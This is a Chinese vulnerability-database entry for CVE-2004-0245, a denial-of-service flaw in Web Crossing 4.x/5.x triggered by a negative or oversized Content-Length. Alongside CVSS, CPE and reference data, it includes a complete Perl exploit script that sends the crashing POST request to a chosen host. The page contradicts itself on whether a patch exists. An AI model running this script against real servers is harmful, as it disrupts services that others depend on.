CVE-2004-0245
CVSS5.0
发布时间 :2004-11-23 00:00:00
修订时间 :2016-10-17 22:42:20
NMCOE    

[原文]Web Crossing 4.x and 5.x allows remote attackers to cause a denial of service (crash) by sending a HTTP POST request with a large or negative Content-Length, which causes an integer divide-by-zero.


[CNNVD]Web Crossing Web Server组件远程服务拒绝漏洞(CNNVD-200411-136)

        Web Crossing 4.x和5.x存在漏洞。远程攻击者可以通过发送一个HTTP POST请求导致服务拒绝(崩溃),该请求带有一个超大或者值为负数的目录长度,可能导致一个整数除以零。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:web_crossing_inc:web_crossing:4.0
cpe:/a:web_crossing_inc:web_crossing:5.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0245
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0245
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200411-136
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=107586518120516&w=2
(UNKNOWN)  BUGTRAQ  20040203 Web Crossing 4.x/5.x Denial of Service Vulnerability
http://www.securityfocus.com/bid/9576
(UNKNOWN)  BID  9576
http://xforce.iss.net/xforce/xfdb/15022
(UNKNOWN)  XF  webcrossing-contentlength-post-dos(15022)

- 漏洞信息

Web Crossing Web Server组件远程服务拒绝漏洞
中危 其他
2004-11-23 00:00:00 2005-10-20 00:00:00
远程  
        Web Crossing 4.x和5.x存在漏洞。远程攻击者可以通过发送一个HTTP POST请求导致服务拒绝(崩溃),该请求带有一个超大或者值为负数的目录长度,可能导致一个整数除以零。

- 公告与补丁

        The vendor has released a fix to address this issue:
        Web Crossing Inc Web Crossing 4.0
        
        Web Crossing Inc Web Crossing 5.0
        

- 漏洞信息 (23648)

Web Crossing Web Server 4.0/5.0 Component Remote Denial Of Service Vulnerability (EDBID:23648)
windows dos
2004-02-04 Verified
0 Peter Winter-Smith
N/A [点击下载]
source: http://www.securityfocus.com/bid/9576/info

The Web Crossing Web Server component has been reported prone to a remote denial of service vulnerability. It has been reported that the issue will present itself when the affected web server receives a malicious HTTP request that contains negative values for certain fields in the HTTP header.

#########################################################################
#!/usr/bin/perl -w
#
#########################################################################
#!/usr/bin/perl -w
#
# Web Crossing 4.x\5.x Denial of Service Exploit
#  [ Bad 'Content-Length' Header Bug ]
#
#  - by Peter Winter-Smith [peter4020@hotmail.com]

use IO::Socket;

if(!($ARGV[0]))
{
 print "Usage: wxdos.pl <victim>\n";
 exit;
}

print "Web Crossing 4.x\\5.x Denial of Service Exploit\n" .
      "\t[ Bad 'Content-Length' Header Bug ]\n" .
      "\t[peter4020\@hotmail.com]\n\n";

$victim = IO::Socket::INET->new(Proto=>'tcp', PeerAddr=>$ARGV[0],
                             PeerPort=>"80")
                            or die "Unable to connect to $ARGV[0] on " .
                             "port 80";


$DoS    = "POST / HTTP/1.1\r\n" .
          "Content-Length: -1\r\n\r\n";

print $victim $DoS;

print "[+] Evil request made to target server ... Waiting...!\n";

sleep(4);

close($victim);

print "[+] Done!\n";
exit;
#########################################################################		

- 漏洞信息

3803
Web Crossing Content-Length Header DoS
Remote / Network Access Denial of Service
Loss of Availability
Exploit Public

- 漏洞描述

Web Crossing Server contains a flaw that may allow a remote denial of service. The issue is triggered when a specially crafted URL is sent to the server with a large or negative Content-Length, and will result in loss of availability for the service.

- 时间线

2004-02-03 2004-02-03
2004-02-03 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站